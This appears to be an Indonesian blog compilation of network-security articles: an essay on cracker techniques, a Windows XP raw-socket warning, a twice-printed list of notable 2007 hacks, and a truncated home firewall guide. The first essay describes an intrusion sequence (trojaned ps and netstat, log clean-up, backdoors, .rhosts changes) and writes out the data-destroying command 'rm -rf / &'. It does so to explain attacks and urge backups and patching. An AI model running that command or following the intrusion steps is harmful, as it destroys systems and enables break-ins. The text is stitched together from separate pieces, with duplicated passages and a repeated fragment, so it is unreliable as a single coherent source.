Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik - jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut - karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini - tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 - karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak - bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Walaupun banyak orang mengakui dan mengagumi kelebihan dari Windows XP dibandingkan dengan pendahulunya (windows 9X, NT dan 2000) dari segi mobilitas

Walaupun banyak orang mengakui dan mengagumi kelebihan dari Windows XP dibandingkan dengan pendahulunya (windows 9X, NT dan 2000) dari segi mobilitas kerja dan keamanannya, disatu sisi ternyata windows XP ini memiliki satu ancaman yang sangat serius terhadap serangan dari para Hacker. Dimana baru-baru ini diketahui bahwa perusahan Microsoft memberikan dukungan penuh kepada Raw Sockets API (Application Programming Interface) pada windows XP Home Edition.

Seperti artikel yang ditulis Steve Gibson, dari perusahan yang bergerak di bidang keamanan jaringan Gibson Research
kembali mengangkat masalah ini kepermukaan ( dapat dibaca pada URL ini www.grc.com ). Adapun ancaman serius ini dapat dijelaskan bahwa akibat dukungan penuh terhadap raw socket API (Application Programming Interface) pada WindowsXP Home Edition, maka seorang Hacker dapat menanamkan program trojan yang menggunakan raw socket untuk menjalankan serangan DDOS (Distributed Deniel of Service) yang tak terlacak.

Seperti kita ketahui juga akibat dari serangan DDOS tersebut maka suatu situs yang dijalankan pada server yang menggunakan Windows XP ini akan dipadati lalu lintas internet sehingga server tadi tidak akan mampu melayani traffic internat yang ditujukan kepadanya akibat kerja yang terus dipaksakan dan ini dapat mengakibatkan suatu server menjadi Hang bahkan juga mati totol.

Coba bayangkan berapa besar kerugian suatu perusahaan e- commerce akibat contoh kasus diatas. Sebenarnya raw socket bukanlah hal yang "unik" bagi windows XP tapi pilihan keamanan yang terbatas pada Windows XP Home
Edition membuatnya rentan terhadap serangan DDOS (Distributed Deniel of Service) tersebut.

Socket adalah merupakan API standar yang digunakan oleh para developer untuk membuat koneksi internet. Socket standar ini berfungsi menghubungkan aplikasi ke layer IP milik sistem operasi melalui layer TCP atau UDP, yang akan membuat paket data dan kontrol standar. Kemudian Raw Socket ini juga akan menyediakan pintu belakang (backdoor) langsung kebagian dasar sistem jaringan, sehingga akan memungkinkan seorang developer akan membuat protokol dan paketnya sendiri. Tetapi seorang Hacker dapat saja membuat program "trojan" dengan menggunakan raw socket untuk mengambil alamat mesin lain, sehingga tindak kejahatan tidak dapat dilacak. Raw soket ini pada awalnya diimplementasikan pada sistem operasi Unix dan hanya dapat di akses dari aplikasi dengan akses sebagai root.

Windows XP dapat saja menggantikan Unix sebagai platform pilihan Hacker. Windows XP dan Windows 2000 mendukung raw socket secara penuh dan disini windows XP sepertinya mengekspos lingkungan Administrator pada banyak komputer. Untuk meminimalisasikan serangan DDOS (Distributed Deniel of Service) pada windows XP seorang Administrator sebaiknya menggunakan firewall dan policy yang lebih profesional. Walaupun kita ketahui bahwa pada lingkungan Windows XP telah terintegrasi firewall untuk keamanan komputer anda terhadap
serangan dari para Hacker. Namun hal tersebut bukan berarti akan menghentikan para Hacker untuk mengirimkan virus, trojan melalui e-mail atau melalui situs-situs yang sudah di hack.

Fitur yang dimiliki firewall windows XP cukup memadai sebagai basic firewall, namun belum dapat dibandingkan dengan firewall lain yang lebih profesional.

11 Kejadian Hacking Terkeren sepanjang 2007

11 Kejadian Hacking Terkeren sepanjang 2007
10 08 2008

Meskipun sedikit terlambat untuk kami menuliskannya, tetapi tulisan yang dibuat oleh Kelly Jackson Higgins yang merupakan Senior Editor pada Dark Reading yang berjudul asli The Five Coolest Hacks of 2007 dan dirilis penghujung tahun 2007 (31 Desember 2007) berisi 5 kegiatan hacking terkeren selama 2007 cukup menarik untuk kami ulas disini, dan baru 2 hari yang lalu dia kembali merilis 6 Kegiatan Hacking terkeren lainnya di 2007 dengan menambahi bagian 2 (lanjutan) dan diberi judul The Coolest Hacks of 2007 - Part II. Berikut adalah 11 hacking terkeren yang terjadi sepanjang tahun 2007 yang diulas di situs Dark Reading

1. Hacking Car Nagivation system

Ditemukannya celah pada suatu sistem navigasi kendaraan yang memungkinkan attacker untuk melakukan injeksi pesan ke sistem atau melakukan serangan DOS. Andrea Barisani, security engineer odari Inverse Path, dan Daniele Bianco, hardware hacker dari Inverse Path, membuat suatu alat untuk melakukan hacking terhadap sistem navigasi berbasis satelit yang menggunakan Radio Data System-Traffic Message Channel (RDS-TMC) untuk menangkap trafik pesan “broadcasts” dan “emergency” . RDS-TMC sangat populer digunakan sebagai sistem navigasi kendaraan di Eropa.

(Penulis melihat video demo kedua hacker ini saat berkesempatan menghadiri konferensi hack in the box tahun lalu di malaysia, mereka menunjukkan bagaimana mereka mengubah pesan yang terdapat pada sistem navigasi, sebgai contoh jalur A yang tidak macet di tampilkan macet baik oleh kerusuhan, huru-hara bahkan ada ancaman bom :) )

2. WiFi ’sidejacking’

Adalah Robert Graham yang merupakan CEO Errata Security, mengejutkan semua pengunjung pada event Blackhat USA di Las Vegas dan mengkloning email GMAIL para pengunjung yang menggunakan jaringan WIFI. Graham, mengambil URL Dan cookies mereka dengan tools yang dia beri nama hamster.

(Teknik ini akan terus menjadi bahasan menarik sampai awal tahun 2008)

3. Eighteen-wheelers

Merupakan salah satu jenis hacking RFID, Para peneliti dari PacketFocus Security Solutions mengatakan jika mereka menemukan bahwa mereka bisa melakukan “scan” dan melakukan hacking label “electronic product code” (EPC) dari suatu produk yang di transportasikan oleh truk/trailer berukuran besar (18 roda). Informasi didalamnya tidak hanya jenis produk, tetapi lebih berbahaya lagi adalah berisi “inventory” dan “shipment-tracking”, dan bisa dibayangkan bila jatuh ketangan pesaing. Hal ini dimungkinkan terjadi karena truk/trailer pengangkut itu berhenti di beberapa tempat tertentu.

4. ‘Hacking capitalism’

Seperti diungkapkan oleh David Goldsmith dari matasano pada event Black Hat USA (agustus 2007), bahwa aplikasi yang di buat untuk Transaksi finansial (FIX; financial information exchange) vulnerable terhadap serangan Denial of service, session-hijacking, dan man-in-the middle attacks melalui internet . Goldsmith tidak menjelaskan detil kelemahan yang dia dan temannya temukan pada FIX dan meminta pihak finansial untuk memeriksa dan mengamankan aplikasi tersebut.

5. iPhone

iPhone merupakan salah satu karya yang “fenomenal”, kemunculannya menimbulkan banyak sekali ide-ide baru, mulai dari bypass yang dilakukan terhadap AT&T, sampai kepada payload khusus iPhone yang dirilis oleh Metasploit.com. HD Moore mengatakan dengan adanya “payloads” iphone yang ditambahkan pada Metasploit dapat membuat para peneliti untuk menciptakan exploits untuk iphone. Payload ini juga memberikan contoh bagaimana untuk menciptakan “shellcode” baru di iPhone.

Part II

1. Hacked highway signs
Banyak kejadian di 2007 yang mengakibatkan “highway signs” berubah menampilkan tulisan yang tidak seharusnya, seperti di Sydney, Australia akhir tahun lalu saat di Jembatan Roseville menampilkan tulisan “You have been 1337 h4×0r3d…Police now target’g sign hackers”. Dan masih banyak kejaian lainnya yang di dokumentasikan di Youtube.

2. Cross-site printing
Seorang peneliti mengeluarkan “proof of concept” untuk hacking intranet printer menggunakan Javascript secara remote. Jenis serangan ini mengharuskan target untuk mengunjungin website yang mengandung kode javascript tersebut. Kemudian attacker dapat menggunakan perintah HTTP POST untuk mencetak menggunakan printer jaringan internal milik target, bahkan berkemungkinan mengirimkan fax.

3. Burnt by your toaster
Seorang ahli dari israel, merubah “toaster” (pemanggang roti) menjadi hacker, Adalah Dr.shalev yang menyebut “crazy toaster” miliknya ini mampu melakukan hacking kesebuah komputer setelah terhubung ke jaringan (wireless) dan disertai beberapa kode yang dia buat yang nantinya akan mengeksploitasi sistem komputer yang ada.

4. Unused but abused browsers
Nathan McFeters and Billy Rios menemukan bahwa mereka bisa menggunakan/membuat Internet Explorer untuk mengirimkan data URL ke Firefox yang “idle” dan tidak berjalan pada suatu komputer. Celah ini diakibatkan oleh kesalahan dari sistem operasi dalam memperlakukan URL, dan ini mengakibatkan attacker dapat berkomunikasi menggunakan browser dan aplikasi apa saja yang mengenali URL untuk berhubungan dengan program lainnya yang seharusnya tidak bisa (idle atau tidak berjalan). URL itu sendiri dapat menjadi perintah (command) di operating system tersebut.

5. Bluetooth-sniffing via a USB stick
Aktifitas ini memungkinkan untuk mendapatkan session dari komunikasi yang dilakukan oleh bluetooth device, lalu dikombinasikan dengan bluetooth PIN-hacking tool (btcrack) maka attacker dapay mengakses data terenkripsi dan mengambil alih peralatan bluetooth tersebut.

6. Hacking the taxi
Billy Chasen yang merupakan software engineer berhasil mengambil alih akses administrasi dari suatu taksi dalam perjalanannya menaiki taksi di kota Newyork, Chasen berhasil berinteraksi dengan “error message”, kemuadian mengakses “FILE” dari “touch screen yang tersedia”, dia juga berhasil terhubung ke internet menggunakan dial-up, yang menjadi berbahaya adalah bahwa para penumpang menggunakan komputer ini untuk membayar dan informasi seperti itu kemungkinan disimpan secara lokal, apalagi dengan kemungkinana dia bisa menginstall aplikasi secara online (sebagai contoh keylogger yang akan mengirimkan secara rutin ?) .

11 Kejadian Hacking Terkeren sepanjang 2007

11 Kejadian Hacking Terkeren sepanjang 2007
10 08 2008

Meskipun sedikit terlambat untuk kami menuliskannya, tetapi tulisan yang dibuat oleh Kelly Jackson Higgins yang merupakan Senior Editor pada Dark Reading yang berjudul asli The Five Coolest Hacks of 2007 dan dirilis penghujung tahun 2007 (31 Desember 2007) berisi 5 kegiatan hacking terkeren selama 2007 cukup menarik untuk kami ulas disini, dan baru 2 hari yang lalu dia kembali merilis 6 Kegiatan Hacking terkeren lainnya di 2007 dengan menambahi bagian 2 (lanjutan) dan diberi judul The Coolest Hacks of 2007 - Part II. Berikut adalah 11 hacking terkeren yang terjadi sepanjang tahun 2007 yang diulas di situs Dark Reading

1. Hacking Car Nagivation system

Ditemukannya celah pada suatu sistem navigasi kendaraan yang memungkinkan attacker untuk melakukan injeksi pesan ke sistem atau melakukan serangan DOS. Andrea Barisani, security engineer odari Inverse Path, dan Daniele Bianco, hardware hacker dari Inverse Path, membuat suatu alat untuk melakukan hacking terhadap sistem navigasi berbasis satelit yang menggunakan Radio Data System-Traffic Message Channel (RDS-TMC) untuk menangkap trafik pesan “broadcasts” dan “emergency” . RDS-TMC sangat populer digunakan sebagai sistem navigasi kendaraan di Eropa.

(Penulis melihat video demo kedua hacker ini saat berkesempatan menghadiri konferensi hack in the box tahun lalu di malaysia, mereka menunjukkan bagaimana mereka mengubah pesan yang terdapat pada sistem navigasi, sebgai contoh jalur A yang tidak macet di tampilkan macet baik oleh kerusuhan, huru-hara bahkan ada ancaman bom :) )

2. WiFi ’sidejacking’

Adalah Robert Graham yang merupakan CEO Errata Security, mengejutkan semua pengunjung pada event Blackhat USA di Las Vegas dan mengkloning email GMAIL para pengunjung yang menggunakan jaringan WIFI. Graham, mengambil URL Dan cookies mereka dengan tools yang dia beri nama hamster.

(Teknik ini akan terus menjadi bahasan menarik sampai awal tahun 2008)

3. Eighteen-wheelers

Merupakan salah satu jenis hacking RFID, Para peneliti dari PacketFocus Security Solutions mengatakan jika mereka menemukan bahwa mereka bisa melakukan “scan” dan melakukan hacking label “electronic product code” (EPC) dari suatu produk yang di transportasikan oleh truk/trailer berukuran besar (18 roda). Informasi didalamnya tidak hanya jenis produk, tetapi lebih berbahaya lagi adalah berisi “inventory” dan “shipment-tracking”, dan bisa dibayangkan bila jatuh ketangan pesaing. Hal ini dimungkinkan terjadi karena truk/trailer pengangkut itu berhenti di beberapa tempat tertentu.

4. ‘Hacking capitalism’

Seperti diungkapkan oleh David Goldsmith dari matasano pada event Black Hat USA (agustus 2007), bahwa aplikasi yang di buat untuk Transaksi finansial (FIX; financial information exchange) vulnerable terhadap serangan Denial of service, session-hijacking, dan man-in-the middle attacks melalui internet . Goldsmith tidak menjelaskan detil kelemahan yang dia dan temannya temukan pada FIX dan meminta pihak finansial untuk memeriksa dan mengamankan aplikasi tersebut.

5. iPhone

iPhone merupakan salah satu karya yang “fenomenal”, kemunculannya menimbulkan banyak sekali ide-ide baru, mulai dari bypass yang dilakukan terhadap AT&T, sampai kepada payload khusus iPhone yang dirilis oleh Metasploit.com. HD Moore mengatakan dengan adanya “payloads” iphone yang ditambahkan pada Metasploit dapat membuat para peneliti untuk menciptakan exploits untuk iphone. Payload ini juga memberikan contoh bagaimana untuk menciptakan “shellcode” baru di iPhone.

Part II

1. Hacked highway signs
Banyak kejadian di 2007 yang mengakibatkan “highway signs” berubah menampilkan tulisan yang tidak seharusnya, seperti di Sydney, Australia akhir tahun lalu saat di Jembatan Roseville menampilkan tulisan “You have been 1337 h4×0r3d…Police now target’g sign hackers”. Dan masih banyak kejaian lainnya yang di dokumentasikan di Youtube.

2. Cross-site printing
Seorang peneliti mengeluarkan “proof of concept” untuk hacking intranet printer menggunakan Javascript secara remote. Jenis serangan ini mengharuskan target untuk mengunjungin website yang mengandung kode javascript tersebut. Kemudian attacker dapat menggunakan perintah HTTP POST untuk mencetak menggunakan printer jaringan internal milik target, bahkan berkemungkinan mengirimkan fax.

3. Burnt by your toaster
Seorang ahli dari israel, merubah “toaster” (pemanggang roti) menjadi hacker, Adalah Dr.shalev yang menyebut “crazy toaster” miliknya ini mampu melakukan hacking kesebuah komputer setelah terhubung ke jaringan (wireless) dan disertai beberapa kode yang dia buat yang nantinya akan mengeksploitasi sistem komputer yang ada.

4. Unused but abused browsers
Nathan McFeters and Billy Rios menemukan bahwa mereka bisa menggunakan/membuat Internet Explorer untuk mengirimkan data URL ke Firefox yang “idle” dan tidak berjalan pada suatu komputer. Celah ini diakibatkan oleh kesalahan dari sistem operasi dalam memperlakukan URL, dan ini mengakibatkan attacker dapat berkomunikasi menggunakan browser dan aplikasi apa saja yang mengenali URL untuk berhubungan dengan program lainnya yang seharusnya tidak bisa (idle atau tidak berjalan). URL itu sendiri dapat menjadi perintah (command) di operating system tersebut.

5. Bluetooth-sniffing via a USB stick
Aktifitas ini memungkinkan untuk mendapatkan session dari komunikasi yang dilakukan oleh bluetooth device, lalu dikombinasikan dengan bluetooth PIN-hacking tool (btcrack) maka attacker dapay mengakses data terenkripsi dan mengambil alih peralatan bluetooth tersebut.

6. Hacking the taxi
Billy Chasen yang merupakan software engineer berhasil mengambil alih akses administrasi dari suatu taksi dalam perjalanannya menaiki taksi di kota Newyork, Chasen berhasil berinteraksi dengan “error message”, kemuadian mengakses “FILE” dari “touch screen yang tersedia”, dia juga berhasil terhubung ke internet menggunakan dial-up, yang menjadi berbahaya adalah bahwa para penumpang menggunakan komputer ini untuk membayar dan informasi seperti itu kemungkinan disimpan secara lokal, apalagi dengan kemungkinana dia bisa menginstall aplikasi secara online (sebagai contoh keylogger yang akan mengirimkan secara rutin ?) .

Lindungi Jaringan Komputer Anda

Worm Blaster dan virus lainnya baru permulaan. Dengan modul-modul yang tersedia di Internet, seseorang yang tidak mengerti pemrograman pun dapat menciptakan virus licik dan menyebarkannya ke dunia digital. Banjir ‘pembunuh’ dari Internet tidak akan pernah surut. Lagipula, bukan hanya virus, trojan, atau worm yang menjadi ancaman bagi data dalam jaringan
pribadi. Hacker dari berbagai negara juga berupaya menyerang PC di seluruh dunia—dan sering berhasil. Kurangnya kesadaran keamanan membantu hacker. Pengguna yang tidak melindungi PC dalam jaringan di rumahnya (karena kurangnya kesadaran akan keamanan), berarti memberi peluang untuk diserang.
Hacker hanya perlu men-scan beberapa port, mengakses PC melalui celah yang ditemukan tersebut, dan dapat merusak dokumen atau mengintip data penting Anda. Walaupun berbagai media tak henti-hentinya berbicara tentang masalah ini, masih banyak saja pengguna yang tidak menggunakan firewall maupun virus scanner. Tindakan masa bodoh seperti ini sama saja dengan mengundang hacker.
Melindungi PC dengan cepat Dengan beberapa trik sederhana Anda sudah dapat mencegah hacker menyusup ke jaringan Anda; atau setidaknya mempersulit kegiatan mereka. Bagaimana caranya, CHIP akan menunjukkannya dalam workshop ini.
Pertama, lakukan segera langkah pengamanan kilat tingkat pertama. Dengan mengikuti langkah ini Anda akan memiliki perlindungan menyeluruh untuk jaringan dan PC Anda. Jika ini dirasakan belum cukup dan Anda menginginkan keamanan yang lebih tinggi, lakukan langkah pengamanan tingkat kedua. Di tingkat tertinggi ini Anda dapat membaca bagaimana cara menginstalasi firewall untuk memblokir setiap hacker, atau bagaimana membagikan hak akses dengan benar.

Langkah-Langkah Menangkal Serangan
Trik-trik di bawah ini tidak perlu waktu lama. Langkah kilat dalam workshop ini menawarkan perlindungan dasar yang baik terhadap berbagai jenis serangan web.
- Menginstalasi Virus Scanner
Langkah pertama untuk menciptakan jaringan yang aman, dilakukan pada PC lokal. Instalasikan sebuah virus scanner, yang tidak hanya menyingkirkan virus, worm, atau perusak lainnya, tetapi juga dapat melindungi dari serangan scr i pt. Karena itu, proteksi ini wajib Anda
lakukan. Tool antivirus gratisan dapat memberikan perlindungan yang memadai. Lebih aman lagi jika Anda melindungi diri dengan program komersial yang juga menawarkan proteksi terhadap virus scr i pt dan worm yang bersembunyi dalam e-mail. Program komersial yang patut disarankan antara lain Norton Antivirus 2004 dari Symantec (www.symantec.com) atau Virus-Scan 8.0 dari MacAfee (www.mcafee.com). Kedua program komersial ini juga terdapat di CHIP-CD. Tak jadi soal, apakah Anda memilih freeware atau software komersial, ada satu hal yang perlu Anda lakukan: Meng-update database virus secara teratur. Download database ciri-ciri (signature) virus dari halaman support produsen, sekurang-kurangnya sebulan sekali (disarankan seminggu sekali). Setelah Anda menginstalasi software antivirus, jalankan proses scan menyeluruh pada PC. Dengan langkah ini Anda dapat memastikan bahwa tidak ada perusak yang telah menyerang PC Anda.
- Mengcopy Windows Patch Secara Teratur.
Setelah Worm Blaster ‘meledak,’ Microsoft bereaksi dengan mengeluarkan patch untuk menutup celah keamanan yang ada. Dengan patch ini Anda dapat mencegah hacker mengakses PC dan data
Anda. Firewall dan program antivirus juga bisa gagal jika masih banyak celah keamanan dalam sistem operasi. Karena itu, berlaku prinsip umum berikut: Ikuti system-update yang disediakan Microsoft ini secara teratur. Dalam setting default, Windows XP akan men-download update secara otomatis dan langsung menginstalasinya. Namun, fungsi update ini menjengkelkan banyak pengguna dan menganggap sepak-terjang Microsoft di sini jadi tidak terkontrol. Selain itu, laporan yang terus menerus muncul juga sangat mengganggu. Putuskan sendiri, apakah Anda
lebih suka melakukan update secara otomatis atau manual. Mengaktifkan update otomatis: Dalam desktop, klik kanan ‘My Computer’ dan pilih ‘Properties’. Pilih tab ‘Automatic Updates’ dan aktifkan ‘Automatically download the updates …’, kemudian tentukan kapan Windows XP Home Edition harus melakukan tugas ini. Dalam praktek, setting ‘Every day/jam 21:00′ terbukti cukup tepat, karena kebanyakan pengguna menghidupkan PC-nya pada jam tersebut. Konfirmasikan dengan mengklik ‘OK’. Melakukan update manual: Kembali ke ‘Automatic Update’ dan aktifkan
pilihan ‘Turn off automatic updating’, lalu klik ‘OK’. Mulai sekarang Anda harus mencari sendiri di website dan memutuskan apa yang harus di-download. Untuk melakukan update secara manual, pilih ‘Start | Programs | Windows Update’. Windows akan menghubungi website
Microsoft dan mencari patch terbaru. Pilih patch yang Anda pikir tepat. Pada prinsipnya, di sini berlaku hal berikut: Semua update yang dianggap kritis oleh Microsoft perlu Anda instalasi. Sebaliknya, ‘Recommended Update’ tidak ada hubungannya dengan keamanan. Update ini diperlukan jika Anda memiliki masalah dengan salah satu komponen atau program Windows.
Windows Me dan 2000: Pengguna Windows lainnya (bukan XP) juga perlu meng-update sistem operasi agar selalu aktual. Di sini Anda harus melakukannya secara manual dan dari waktu ke waktu dengan mengklik ‘Windows Update’. Windows akan menghubungi server update Microsoft dan mencari patch terbaru di sana, yang kemudian dapat Anda pilih.
- Menginstalasi Software Firewall
Agar hacker dan penyerang lainnya tidak dapat mengakses PC Anda, dibutuhkan sebuah firewall. Dengan tool ini Anda memblokir port tertentu yang merupakan sasaran para hacker. McAfee Firewall yang gratis dapat Anda temukan di internet. Setelah terinstalasi, ia dapat memberikan perlindungan yang bagus terhadap hacker dan ancaman lainnya. Walaupun demikian, performanya masih dapat ditingkatkan dan pengawasannya dapat diatur secara lebih rinci. Lebih lanjut mengenai hal ini baca bagian 2, ‘Proteksi profesional’.
- Menginstalasi Hardware Firewall
Jika Anda terhubung ke Internet melalui sebuah router, aktifkan firewall router yang disertakan. Karena interface router berbeda-beda, baca dengan cermat prosedur menghidupkan firewall dalam buku panduannya. Pada 99% router yang kini tersedia, Anda dapat mengubah
setting-nya melalui sebuah tampilan web. Di sini akan diberikan beberapa tip dasar.
Amankan dengan password agar router tidak dapat diubah oleh sebarang orang. Tergantung perangkatnya, Anda harus mencari ‘IP-Filter’, ‘Firewall’, ‘Port Blocking’, dan ‘NAT-Portsharing’. Semua komputer menggunakan Network Address Translation (NAT).Artinya,
semua PC menggunakan IP yang sama untuk keluar. Router secara otomatis akan meneruskan permintaan kepada PC dalam jaringan. Ini menyulitkan serangan dari luar, karena tidak dapat menghubungi sebuah PC secara langsung. Namun, kini banyak aplikasi yang membutuhkan
